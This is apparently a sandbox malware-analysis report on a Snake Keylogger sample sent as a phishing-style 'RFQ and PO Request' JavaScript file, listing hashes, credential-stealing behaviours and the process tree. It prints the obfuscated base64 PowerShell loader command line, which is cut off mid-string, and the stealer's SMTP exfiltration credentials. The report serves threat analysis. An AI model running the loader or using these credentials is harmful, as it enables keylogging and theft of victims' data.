File name:

4e5de3dba8ee1e3ea841feb67b4a6350a6796f019c20859939a8c8be0d33402d.zip

Full analysis: https://app.any.run/tasks/ff8bb3a4-c3f8-4164-9005-2f57b0529dd8
Verdict: Malicious activity
Threats:

A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools.

Malware Trends Tracker     >>>
Analysis date: March 03, 2026, 09:57:20
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-scr
evasion
snake
keylogger
telegram
stealer
spyware
susp-powershell
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

ACB36F3EF8C8BC21534E450583E577ED

SHA1:

2059A3023511A60D3FC2D839488304C6B0889980

SHA256:

4E5DE3DBA8EE1E3EA841FEB67B4A6350A6796F019C20859939A8C8BE0D33402D

SSDEEP:

98304:htOAsbCsLsR+1LGDToMJnURzAqf3LAG5wFf/tDkSfWXaFZv+pXuOcIYZfAFGCnIi:rTZ2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses base64 encoding (SCRIPT)

      • wscript.exe (PID: 6020)

    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 2788)

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 2788)

    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 2788)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 2788)

    • Steals credentials from Web Browsers

      • powershell.exe (PID: 2788)

    • Actions looks like stealing of personal data

      • powershell.exe (PID: 2788)

    • SNAKE has been detected (YARA)

      • powershell.exe (PID: 2788)

    • SNAKE has been detected (SURICATA)

      • powershell.exe (PID: 2788)

  • SUSPICIOUS

    • Sets XML DOM element text (SCRIPT)

      • wscript.exe (PID: 6020)

    • Writes binary data to a Stream object (SCRIPT)

      • wscript.exe (PID: 6020)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 6020)

    • Creates XML DOM element (SCRIPT)

      • wscript.exe (PID: 6020)

    • The process executes JS scripts

      • wscript.exe (PID: 6020)

    • Gets name of the script (SCRIPT)

      • wscript.exe (PID: 6020)

    • Script creates XML DOM node (SCRIPT)

      • wscript.exe (PID: 6020)

    • Changes charset (SCRIPT)

      • wscript.exe (PID: 6020)

    • Saves data to a binary file (SCRIPT)

      • wscript.exe (PID: 6020)

    • Creates a Stream, which may work with files, input/output devices, pipes, or TCP/IP sockets (SCRIPT)

      • wscript.exe (PID: 6020)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6020)

    • Сharacter substitution obfuscation via .replace()

      • powershell.exe (PID: 2788)

    • Executes script without checking the security policy

      • powershell.exe (PID: 2788)

    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 6020)

    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 6020)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 6020)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 2788)

    • Writes data to a memory stream (POWERSHELL)

      • powershell.exe (PID: 2788)

    • Checks for external IP

      • svchost.exe (PID: 2292)
      • powershell.exe (PID: 2788)

    • Connects to SMTP port

      • powershell.exe (PID: 2788)

    • Possible stealing of FTP data

      • powershell.exe (PID: 2788)

    • Possible stealing of messenger data

      • powershell.exe (PID: 2788)

    • Loads DLL from Mozilla Firefox

      • powershell.exe (PID: 2788)

    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 2788)

    • Possible stealing of email data

      • powershell.exe (PID: 2788)

    • Possible stealing from browsers

      • powershell.exe (PID: 2788)

  • INFO

    • Generic archive extractor

      • WinRAR.exe (PID: 8456)

    • Drops script file

      • wscript.exe (PID: 6020)
      • powershell.exe (PID: 2788)

    • Manual execution by a user

      • wscript.exe (PID: 6020)

    • Creates a byte array (POWERSHELL)

      • powershell.exe (PID: 2788)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 2788)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 2788)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 2788)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 2788)

    • Disables trace logs

      • powershell.exe (PID: 2788)

    • Checks proxy server information

      • powershell.exe (PID: 2788)
      • slui.exe (PID: 3920)

    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 2788)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

SnakeKeylogger

(PID) Process(2788) powershell.exe
Keys
DES6fc98cd68a1aab8b
Options
SMTP Usersnakesender@exzwzc.com
SMTP PasswordQwerty!@#
SMTP Hostcphost17.qhoster.net
SMTP SendTokingmethodlogs2026@exzwzc.com
SMTP Port587
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2026:03:02 22:55:48
ZipCRC: 0xd3d890b0
ZipCompressedSize: 2155936
ZipUncompressedSize: 4304537
ZipFileName: RFQ 07283 and PO Request.JS
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
148
Monitored processes
6
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs wscript.exe no specs #SNAKE powershell.exe conhost.exe no specs svchost.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
2292C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2788"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Noexit -nop -c iex([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(('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